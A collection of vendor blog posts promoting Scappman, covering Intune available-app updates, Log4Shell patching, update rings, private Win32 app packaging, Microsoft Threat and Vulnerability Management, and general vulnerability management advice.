How to keep your available Intune apps up to date
Available apps in the Company Portal is one of those features you really want to use, but can’t, because you lose control. Until now. From a user’s perspective, available apps in the Company Portal are awesome! Your computer isn’t bloated with unnecessary apps, but at the same time you do have the freedom and flexibility to install apps that have been approved by your IT-department, without having to create a ticket and waiting a week or two to get the app. And it’s super easy, you just open the Company Portal app, select the app you want to install and a short while later you’re good to go! But there’s a catch. Available apps are just that, available to be installed. That means that when it’s time to update that app, the new version is also just available. It won’t update itself for the users that have already installed it. Add a few versions and you end up with an application landscape that is completely out of control and super insecure. There are some complex workarounds out there with adding users to groups and using different types of assignments, but none of those are really reliable. So, how can you keep available installations in check? Create a PowerShell script that will detect if the application is installed and returns true or false. This can be as simple as testing if a registry key exists: Test-Path ‘HKLM:\SOFTWARE\Scappman’ Create your application as you would otherwise, but on the Requirements page, click Add in the scripts section. Upload your freshly created requirement script. In our example, the script would return true if the key is found, so we configure it as a boolean that equals yes. The next time a device checks in, the requirement script will run and if it returns true the application will automatically be updated, if the detection rules are not present. In the status overview the devices that have been updated will be reported as installed, while the devices on which the application was not detected will be reported as Not Applicable. The easy way Don’t want to spend time on creating all those scripts, but you do want the awesome Available apps feature in Intune? Check out Scappman! Not only does Scappman enable you to use Available apps for the predefined apps in the App Store, it also allows you to upload your own app, provide the name that it uses in the “Apps & Features” settings page and keep your own custom apps in check. Find out here how we do it for you
Everything you need to know about Log4Shell and how keeping apps up to date can save your data
If you still haven’t heard of the discovered Apache Log4j vulnerability, you are at big risk now – MUST-READ! Last Tuesday, on December 9, 2021, a high-level vulnerability that affects the core function of Log4j – CVE-2021-44228, aka Log4Shell or LogJam, was discovered by the Alibaba Cloud Security Team. Since then, the number of attacks exploiting the flaw has exceeded one million. What is Log4j and why its vulnerability can affect the security of your data? Log4j is an open-source Apache logging library that is commonly used in many applications to keep track of user activity within an application. A lot of Java-based applications and cloud services use Log4j logging library, like Apple iCloud, Amazon, Cisco, Cloudflare, Red Hat, Steam, Twitter. And now all these services are vulnerable. The discovered vulnerability – Log4Shell – gives attackers the ability to run remote code execution (RCE) on vulnerable applications, which basically means that they can perform ANY action with your data with no authentication: the data can be stolen, deleted, encrypted, or hold for ransom! According to the CVSS scale, Log4Shell is rated with a score of 10 out of 10. It’s been already thousands of confirmed attacks on companies’ data using CVE-2021-44228, which is not a surprise. What makes Log4shell especially dangerous is that Log4j library is used by millions of application vendors and the ease of attack executions with this vulnerability. So, experts expect even more attacks in the coming weeks. Patching is the only option! But the main question is – what can companies do to prevent the vulnerability of their data? Patching and keeping your applications up to date! Patching a single application isn’t that difficult, but each application must be tested to be sure that the updated app works properly. While patching applications is extremely time-consuming, it’s a top priority for all organizations to keep their data secure. How Scappman can help to protect data in your company? If you still haven’t heard of Scappman – now it’s the time! Scappman is a must to prevent damage from Log4j vulnerability because we update third-party and private apps for you, so you can be sure that the latest versions of apps are installed on every computer and your data is secure. No need to spend days patching a single application! P.S. A non-exhaustive list of vulnerable software you can find here: https://github.com/NCSC-NL/log4shell/tree/main/software
Trends for Microsoft Intune in 2022
Trend 1: Further integration of Apple products in Microsoft Intune One thing that was on the roadmap for already December 2021 was Management of user-installed apps on iOS. Intune can manage previously installed iOS applications in this update once they’re synced with Intune. As a result, previously installed applications do not need to be deleted and re-issued onto devices enrolled in Intune using device enrollment. These applications might have been distributed using different MDM’s previously, or they might have been personally installed. This feature simplifies the configuration management process for both required and available applications when enrolling devices to Intune. The second integration is getting the defender for MacOS policies in Settings Catalog, also previewed in the release of Jan 2022. The third thing on the roadmap and where Microsoft is working is enrolling BYOD or personally owned devices by Apple. This was already possible for Android devices in the Microsoft Intune environment since April 2021. In 2022 it will be possible if Microsoft sticks to the roadmap, of course, to “Enroll devices into Intune through Apple account management.” The last thing in this trend is adding DMG type app management for MacOS and extending app deployment and management to include the exe-version of Apple apps – DMG for MacOS. The cool thing is that if Microsoft continues this way, there should be no reason for companies not to accept Apple products/devices in their Microsoft Intune environment. Trend 2: Microsoft Intune and Microsoft Endpoint Manager also integrate on the server-side of things Linux Ubuntu still has the highest percentage of servers running in the world. There’s even an article about it, “Can the Internet exist without Linux”? In the enterprise world, this means that they will be able to register and manage and secure Linux Ubuntu desktops and laptops and use conditional access for compliance. Microsoft will start with “Ubuntu,” but support is on its way towards Redhat, Centos, and Fedora. As part of that move, IT administrators will now be allowed to create Azure Active Directory conditional access policies for Linux machines, just like they do for other Windows, mobile, and Mac machines, to ensure that only Linux equipment that isn’t in violation of the policy can gain access to corporate resources such as Microsoft Office 365 applications. Microsoft Endpoint Manager’s team said that in addition to adding custom management and security capabilities to the platform, these additional features would be beneficial for verifying the encryption status for detecting any issues that result from BitLocker and Windows Defender Firewall settings or regularly comparing the security score in Defender for Endpoint to guarantee that any security flaws are detected and fixed. Trend 3: Moving from SCCM to Microsoft Intune or doing Co-Management We even wrote an article, “From SCCM to Microsoft Intune.” Many companies with SCCM, better known as System center configuration Manager, formerly known as SMS, Systems Management Server, are moving towards Microsoft Intune. The most significant difference between these traditional methods and the new Microsoft Intune is that SCCM is image-based management and Microsoft Intune is profile-based management. Brad Anderson, CVP Microsoft, predicted that the penetration of Intune in the market would be 50% of Intune on January 1st, 2022. Still, a lot has changed in the last two years, especially in security and the modern workspace. We’re not going down that road, but Covid-19 kickstarted the adoption of Microsoft Intune. Because during Covid-19, we saw an increase of Bring-Your-Own-Device or Use-of-own-Device, working from home, etc., all with the necessary critical security flaws. These reasons meant Intune rapidly got more market share. In August of last year, Gartner acknowledged that Microsoft was the ultimate leader For Unified Endpoint Management Tools. We don’t know the exact number of companies using Microsoft Intune, but some internal sources say it has increased by 240%. This means that Chris probably didn’t undersell the 50% adoption of the software. The problem is that Microsoft Intune can’t do all the things that SCCM can do and that SCCM, even with Microsoft Intune, can’t do all the things that the full Microsoft Intune manager can do. So, some companies that are switching from SCCM are doing the CO-Management. We will explain CO-Management in a different blog post. What you need to remember is the following image. Sidenote by Microsoft: When you manage devices with both Configuration Manager and Microsoft Intune, this configuration is called co-management. When you contain devices with Configuration Manager and enroll in a third-party MDM service, this configuration is called coexistence. So, unless you have co-management, Configuration Manager, and Intune in place, you can’t balance the workloads, resulting in conflicts. This interaction is not available with third-party integrations, and therefore there are restrictions on the management capabilities of coexistence.
How Scappman manages Multi-tenancy
Managed Service Providers (MSP’s) are always looking for automation in recurring tasks. To change some settings for 1 customer and doing this same action for 1000 other customers is a very time consuming job. The same counts for application patch management. MSP’s want to make sure all of their customers are secured with the latest software patches. If your customers are using Microsoft Endpoint Manager and you would like them to be up-to-date with all applications, you’ll need to monitor new versions, package these versions and wrap them in an Intunewin file. Then you’ll need to upload the packages to all tenants of your customers. Already have done that? Than you probably know that you can start all over again as by the time you got finished, a new update is available. At Scappman we’ve implemented an easy solution to switch between your customers, you’ll be able to see what your customers can see (If you allowed them to access the portal). No need to sign out or sign in into multiple tenants. We have a reseller – customer relation defined so you can have a good overview about your customers patch status.
The best mobile device management solution in 2022: SCCM vs. Intune
Choosing mobile device management (MDM) and mobile application management (MAM) solutions for your company can be challenging. With ‘bring your own device’ (BYOD) on the rise, MDM plays a crucial role in controlling corporate data on devices by configuring accessibility policies and data security. Here, the eternal dilemma arises: Should you go with Microsoft System Center Configuration Manager ConfigMgr (SCCM) or Microsoft Intune? Both solutions are parts of Microsoft Endpoint Manager – a single, integrated platform for managing all the endpoints in the organization. Intune is a cloud-based solution that allows you to manage company-owned and personal devices, while SCCM is a more traditional on-premises solution. Let’s look at both solutions, evaluating their pros and cons. What is SCCM / ConfigMgr? According to Microsoft, “SCCM is an on-premises solution to manage desktops, servers, and laptops that are on your network or internet-based.” Originally released in 1994, now part of Microsoft Endpoint Manager (MEM), it focuses on managing Windows devices across the enterprise (300+ devices). SCCM’s functionality includes: SCCM Pros: SCCM Cons: What is Microsoft Intune? Microsoft identifies Intune as a “cloud-based service that focuses on mobile device management (MDM) and mobile application management (MAM).” Being a cloud-based application, Intune has a simpler architecture than SCCM because it does not require on-premises infrastructure to operate. One of the main aims of Intune is to create a secure work environment by controlling device usage and designing customized access policies for devices, including BYODs. Intune can separate corporate data from employees’ personal data on BYODs, which is convenient as they will no longer need several devices. Moreover, with Intune, it’s easy to make sure that all devices are compliant with enterprise requirements. Intune’s additional features are: Intune Pros: Intune Cons: SCCM vs. Intune – Overview Feature SCCM Microsoft Intune Positioning On-prem Cloud Costs Subscription Subscription (price depends on the used data) Software updates Supports updates, patches, and software Supports updates, patches, and software Servers Servers required No physical server is needed – requires Internet access Remote features VPN, Wi-Fi Remote deployment Summary Microsoft Intune and System Center Configuration Manager offer various features, but it’s up to you to decide which best suits your business. Intune is a cloud-based solution accessible anywhere, making it perfect for remote workers. As a result of the ongoing COVID-19 pandemic, employees are working outside of protected corporate networks, using their own devices, and thanks to Intune, corporate data is safeguarded. Furthermore, Intune supports limited monitoring and managing of non-Windows systems. SCCM is a potent tool that can manage a variety of endpoints and has rich functionality. However, it can be complicated to work with and expensive.
What are applications update rings?
For a company, applications can be challenging to manage. They need to be installed on computers and regularly maintained afterwards. When a new application update is available, the IT department needs to reinstall them on all computers. Note: All applications need to be up to date, so hackers cannot abuse vulnerabilities in the software! On average, an application needs updating once a week, and the update takes around four hours to package and test. By multiplying this by the number of applications in your company, you’ll know how much precious time IT spends on this process. The bigger the company, the more control you need. Installing a conflicting update to more than 1,000 users can be a disaster for your business. For this reason, it’s essential to roll out updates in waves. In IT terminology, this process is called “update rings.” With update rings, IT can install updates to a limited group of users (pilot group). Once IT has confirmed no issues or conflicts, they can advance the update to a larger user group. If there are no issues or conflicts for this group, they can update for another group, and so on. Thus, the bigger the company, the more rings. IT needs to manage and monitor this update process for every update of every application. This activity is not the most thrilling task for a professional IT team, which is one of the reasons why companies don’t always have the latest applications versions. How to manage application update rings in Intune? There are different ways to manage application update rings in Intune. Changing the sources of an application. Changing the assignments for an application. Changing the sources of an application In this scenario, you created an application for each update ring. The sources and settings are the same for all the applications, but the assignments are different. As an example, let’s take three update rings. Application_Group_Fast Application_Group_Slow Application_Group_Release At creation, all applications have the same version but different assignments. When a new version of the application is released. IT can change the .Intunewin file containing the new sources, commands and configuration settings. Members of the Group_Fast will get the update and can validate it. After the testing period is finished, IT can change the .Intunewin file for the next group. A lot of manual work is involved in these actions if you don’t have an automation tool for it. Changing the assignments for the application Another way to use update rings is by changing the assignments for the application. In this case, IT creates a new application for each version. The first version will have the three groups assigned for installation. With a new application version, IT creates a second Intune application, assigning the Group_fast to this version. After testing and validation, IT assigns the next group to the new application. This process is then repeated until all groups have been assigned to the new application. Afterward, the initial version can be removed from Intune.
What is a day zero-bug or a zero-day attack?
A day zero-bug or zero-day attack, as defined by Hewlett Packard, “occurs when a vulnerability is being exploited before the vulnerable software vendor has knowledge of the vulnerability and develops a patch.” Zero-day attacks are dangerous because malicious hackers can use them to exploit vulnerabilities before patches are even available. So the meaning of a zero-day bug is pretty straightforward; it’s the same as when you ask a company when they want a project finished, and they say, “Yesterday.” Yesterday was the day everything was alright. Contrastingly, today is not. You have less than a day or zero days to fix the bug or have the vendors create a patch. The difference between a zero-day vulnerability, a zero-day exploit, a zero-day attack and a zero-day virus A zero-day vulnerability is a programming vulnerability discovered by hackers upon vendor deployment. There’s no software patch available for zero hour exposure, enabling any assault to proceed. So a zero-day is the opposite of a known vulnerability, which is a known vulnerability, with a published patch. A zero-day exploit is an action taken by hackers to obtain access to a system containing an unexpected vulnerable flaw. A zero-day attack is an attack that uses a zero-day exploit or attacks the system with a zero-day vulnerability. A zero-day virus is a technical term for computer malware created, not yet discovered. It’s all in the patches Patching and updating are crucial aspects of removing vulnerabilities. The increase in cyberattacks during the pandemic has been phenomenal. Some reports state a rise of 600%, with a noticeable increase in attacks targeting mobile devices. But 9 out of 10 times, if you’re in this industry or market, you’ll probably already know this. With working from home and BYOD policies, it’s becoming an even bigger issue. The reason is straightforward; it’s an open door for hackers. Even when company policies and VPNs are in place, it’s still tricky for IT managers to keep hackers out of their systems. That’s why Microsoft Endpoint Manager and Microsoft Intune are necessary software in every enterprise currently working in a Microsoft ecosystem. And if you really want to be secure, it’ll be even better to include Scappman as an add-on. Scappman is a 100% cloud solution that automatically installs your applications and keeps them up-to-date, saving hours of IT team time. So now you know the difference between attacks, exploits, etc. Remember: It’s better to be safe than sorry.
How to manage private applications in Microsoft Intune?
We get this question a lot. First, it could be that people have a different understanding of what are private apps or what are public apps. Private applications are applications: where the sources can’t be downloaded from the internet without providing personal information. that require a license key or license file. Private applications are not monitored for new versions. Note: It’s the customer or partner’s responsibility to provide Scappman any resources for the initial packaging or any update afterwards together with a procedure on how to install the application. Scappman can package these applications, but these are billable. Prices are listed on the platform. Public applications: Public applications are applications where Scappman has access to the sources on the website of the vendor. Public applications are monitored for new versions and are updated by Scappman on the platform. Note: Public applications that do not support silent installs can only be requested as a private application. Scappman will package these applications for free for subscribed customers. Private application management in Microsoft Intune Prepare the application installation file for upload Before you add a private app to Microsoft Intune to be able to manage it, you must use Microsoft Win32 Content Prep Tool in order to prepare the app for upload. The tool wraps the application installation file into the .intunewin format. Also, it detects some of the parameters that Intune requires to determine the application installation state. After that, your application is ready to be uploaded to Intune. Let’s use the app <yourprivateapp> as an example. Download Microsoft Win32 Content Prep Tool from GitHub . The .zip file contains IntuneWinAppUtil.exe, Microsoft License Terms, Read me file and Release notes. Use the latest version of the Microsoft Win32 Content Prep Tool otherwise, you’ll see a warning that says the app was packaged using an older version of the tool. Create a folder that contains the private application installation files Create an installation file yourprivateapp.cmd that contains the installation command and put the file in the directory with other installation files. Now open a Command Prompt and go to the location of IntuneWinAppUtil.exe: cd/<name of the folder> Run IntuneWinAppUtil.exe and provide the requested information: Source folder Setup file Output folder 6. Once the installation file is converted, you’ll see the message Done!!! Now the private application is ready to be uploaded to Microsoft Intune. Add a private app to Intune Sign in to the Microsoft Endpoint Manager admin center On the pane go to Apps -> All apps -> Add In Select app type menu choose Windows app (Win32) In the Add App menu you have to select the app package – the file that we created – yourprivateapp.intunewin in click OK In the App information menu add the details for your private application: Name Description Publisher Category Show this as a featured app in the Company portal Information URL Privacy URL Developer Owner Notes Logo 6. In the Program tab you can configure the application installation process using commands, install and device restart behavior. Install command – normally, it’s filled in automatically. If it’s not the case – use yourprivateapp.cmd Uninstall command – msiexec /x “{12345A67-89B0-1234-5678-000001000000}” Device restart behavior – here you can select one of 4 options: Determine behavior based on return codes No specific action: Choose this option to suppress device restarts during the app installation of MSI-based apps. This is preferred if you don’t want to reboot the device after the app installation App install may force a device restart Intune will force a mandatory device restart Specify return codes to indicate post-installation behavior: add the return codes that are used to specify either app installation retry behavior or post-installation behavior. Return code entries are added by default during app creation. But you can add more return codes or change existing ones. Code types: Success – the return code was successfully installed Retry – the return code will be attempted to be installed the application 3 times. It will wait 5 minutes between each attempt. Soft reboot allows the private app to be installed without a reboot. However, reboot is necesssary to complete application installation. Hard reboot does not allow the application to be istalled on the device without a reboot Failed – the application is failed to be installed 7. In the Requirements section you can specify the requirements that the device must meet before the application is installed: Operating system architecture : 32-bit / 64-bit Minimum operating system Disk space required (optional) Physical memory required (optional) Minimum number of logical processors required (optional) Minimum CPU speed required (optional) 8. When deploying the private app you must specify the detection rules – how the availability of the private application will be detected. It can be done manually or by using a custom PowerShell script. Manual detection rules format: MSI: this rule type enables the admin to create a detection rule that must detect a specific MSI product code or even a specific MSI version. This detection rule type can only be used once. File rule type enables the admin to create a detection rule that detects a specific file or folder, date, version, or size to determine the installation of the private app. Requirement rules: Path – specify the full path of the folder that contains the application file File or folder – specify the file or folder that should be used to detect the app Detection method – choose the option that should be used to detect the installation of the app (File or folder exists, Date modified, Date created, String (version), Size in MB) Registry: with this detection rule the Intune admin enables detection of the application installation based on the value, string, integer, or version. Requirement rules: Key path – identify the full path of the registry entry containing the value that should be used to detect the installation of the app. Ex.: HKEY_LOCAL_MACHINE\Software\YourPrivateApp Value name: if this property is empty, the detection will happen on the default value. The default value will also
Detecting vulnerable applications with Microsoft Threat and Vulnerability Management
Given the number of cyberattacks facing companies these days, fixing vulnerabilities has become one of the biggest challenges. According to the US-CERT Vulnerability database, 18376 new security vulnerabilities were detected in 2021, which surpasses the 2020 record of 18351. But more than half of them (57%) could have been prevented by being identified and fixed on time. Another example to support the importance of the problem is that only 16% of executives are prepared to deal with cyber threats. Thus, identifying, assessing, and remediating new endpoint vulnerabilities is crucial in implementing a successful security strategy. Microsoft Threat and Vulnerability Management (TVM) helps organizations with these. It discovers the vulnerabilities that exist on the onboarded endpoints, and errors in the configuration in real-time with sensors and gives recommendations that you can follow to secure your endpoints. In this blog, we will cover TVM’s functionality and how it helps you increase the security of your IT system by identifying vulnerable applications and software. What is Microsoft TVM? Microsoft TVM is one of the security pillars of Microsoft Defender for Endpoint, which aims to identify vulnerabilities and misconfigurations in real-time and prioritize them based on the threat landscape. It is cloud-powered and fully integrated with Microsoft endpoint security stack, the Microsoft Intelligent Security Graph, and the application analytics knowledge base. Microsoft TVM is a game changer – it helps bridge the gap between security operations, Security Administration, and ID administration. Real-time discovery. Vulnerabilities discovery is the first step in TVM. Microsoft Defender for Endpoint constantly collects and transmits all the information about the endpoint (OS, the installed applications and behavior of the device) to the cloud using the built-in sensors in Windows 10/11. Real-time discovery functionality means: Real-time device inventory – Devices onboarded to Defender for Endpoint automatically report and push vulnerability and security configuration data to the dashboard. Visibility into software and vulnerabilities – Optics into the organization’s software inventory, and software changes like installations, uninstalls, and patches. Newly discovered vulnerabilities are reported with actionable mitigation recommendations for 1st and 3rd party applications. Application runtime context – Visibility on application usage patterns for better prioritization and decision-making. Configuration posture – Visibility into organizational security configuration or misconfigurations. Issues are reported on the dashboard with actionable security recommendations. 2. Intelligence-driven prioritization. TVM provides insights that help users to prioritize security tasks and focus on the most urgent ones. Furthermore, users receive security recommendations based on the dynamic threat and business context: Emerging attacks in the wild – Microsoft threat intelligence determines emerging threats around the world. Based on this data, it prioritizes the security recommendations to focus on currently exploited vulnerabilities with the highest risk. Pinpointing active breaches – Microsoft Defender for Endpoint knows what attacks are currently happening in your organization. TVM processes this data in order to prioritize security recommendations. Protecting high-value assets – as it is a Microsoft solution, there is a deep integration with Microsoft Information Protection, that enables identifying of confidential data or business-critical applications. 3. Seamless remediation involves security and IT administrators. The security admins track and manage vulnerabilities, while the IT admins are responsible for patching. TVM Components Threat & Vulnerability Management Dashboard: gives a high-level view on the security of the organization, including the exposure score, Microsoft Secure Score, and device exposure distribution. To access the TVM dashboard go to security.microsoft.com. On the pane go to Endpoints -> Vulnerability management -> Dashboard. Exposure score is a metric that reflects the overall exposure of the endpoints across the organization. The lower the score the better. The exposure score is broken down into levels: 0–29: low exposure score. 30–69: medium exposure score. 70–100: high exposure score. There are many factors that have an impact on the exposure score, such as the number of weaknesses discovered on your devices, the likelihood of a device getting breached, and the value of the device to the organization. On the exposure score pane, you can see the dynamic of the score, which is changing all the time due to newly released CVE’s and taken actions. Microsoft Secure Score reflects the collective security configuration state of the endpoints across 6 categories: Application Operating system Network Accounts Security controls Device exposure distribution The higher the score, the more your endpoints are protected against cyber threats. Microsoft Secure Score is calculated based on the configuration discovery assessment on all endpoints of the organization which is compared to benchmarks maintained by Microsoft – recommended configurations from applications vendors and internal research team in Microsoft. The dashboard also provides configuration score trend over time, so you can track how the score evolves over time. Device exposure distribution demonstrates how many devices are exposed based on their exposure level. Selecting a section in the doughnut chart you can see the list of devices affected, their exposure and risk level, domain, OS platform, Windows version, health state, when it was last updated and tag. Recommendations Threats and vulnerabilities identified in your company are mapped to security recommendations and prioritized by their impact. Following prioritized security recommendations, you can reduce your exposure score and increase your configuration score. Every device is scored based on 3 factors in order to help users to focus on the right things at the right time: Threat: characteristics of the attack happening with the particular vulnerability. Breach likelihood: your company’s security posture and resilience against vulnerability. Business value: impact on the company’s assets and processes. To access Security Recommendations, go to Vulnerability management -> Recommendations. Security recommendations details Let’s take a closer look at one of the recommendations (Update Microsoft Windows 10 (OS and built-in applications). After clicking on the recommendation, you’ll see the details of the recommendation, including: A description of the security recommendation Number of exposed devices and list of all endpoints Impact on exposure and secure scores List of vulnerabilities associated with the recommendation breakdown of CVEs based on the impact (critical, high, medium, low) Description of CVE Related threats Exposed OS In the security recommendations menu, you also can:
Vulnerability Management explained
What is vulnerability management? Vulnerability management is the practice of proactively identifying and assessing vulnerabilities within an IT system, a crucial element in executing a cybersecurity strategy. This means that computer systems are potentially a significant risk to the system’s security when vulnerabilities are not addressed. If vulnerability had a slogan, it would be: “better safe than sorry”. Common vulnerability scoring system (CVSS) A nonprofit called “FIRST” is looking to standardize this in a framework called the CVSS or Common vulnerability scoring system. Based on analyzing their data from several CISOs and experts in the security information industry, they have already released their 3rd version of their model. It’s now more focused on timing and environment. You have a base metric group, a temporal metric group, and an environmental group. The cool thing about the guys from “FIRST” is that they have their online calculator to check your vulnerability scores. You can find it here. The range goes from 0.0 to 10.0. Based on the CVSS, the average vulnerability was 7.1 out of 10.0, to give some numbers. Google and Microsoft had the most vulnerabilities, respectively 1123 and 1108. These two make up more than 10% of the total number of vulnerabilities in 2021. If you must think about your own company, you’re 99% working with either of these products. To mitigate these vulnerabilities, vulnerability management is the best way forward. Taking charge and ownership is the way forward. The first step in vulnerability management is detecting the vulnerabilities. Microsoft Defender for Endpoint can be one of those products that can help build a healthy security environment. It discovers vulnerability and misconfigurations in real-time with sensors. It’s the first barrier against ransomware, malware, and hackers. Patch management is a second barrier A patch management policy should be a second barrier. As many as 60% of the data breaches were related to vulnerable software, so software that wasn’t patched. As weekly costs on maintenance rose by 34%, the cost of care surpassed those of the previous year. Lowered reliability due to vulnerabilities’ rectification took up more time during the last years. You can find more about patch management policy here. What are the vulnerability management best practices? A vulnerability management system is needed at any company to effectively manage any risks afflicted by unaddressed flaws in IT systems. Here is the checklist to help you make sure you’ve covered all the basics and are protecting your company IT infrastructure in a responsible way. This inventory should include OS + versions, native and third-party applications used by users in your organisation. With a clear overview of your IT environment, you can make sure you’re patching everything needing to be patched. Microsoft TVM is a good solution to provide you with a full overview of your IT system. To know more about Microsoft TVM, read this blog. 2. Prioritize vulnerabilities Classifying vulnerabilities based on impact and severity is one of the basic steps to remediate risks. Categorizing these vulnerabilities helps businesses to understand and assess the issues. In Microsoft TVM you can see the severity of the vulnerability (Vulnerability Management -> Weaknesses). Read more here. 3. Apply patches as soon as possible, but don’t forget about testing It’s essential to install software updates as soon as they are available, but in the meantime, a bad patch can break other parts of your system. To avoid this – test the patches before you deploy them to the entire system. 4. Scan and audit your IT environment for any vulnerabilities missing regularly The longer these security holes are open, the more likely it is you’ll be attacked. Patch management should be a continuous process with regular and ongoing scanning. 5. Automate the match management process With the right software to manage your patches, like Scappman, you can significantly reduce the amount of work you have to do. This software is much more effective than doing things manually, so it’s worth of investment. Just remember it’s better to be safe than sorry.
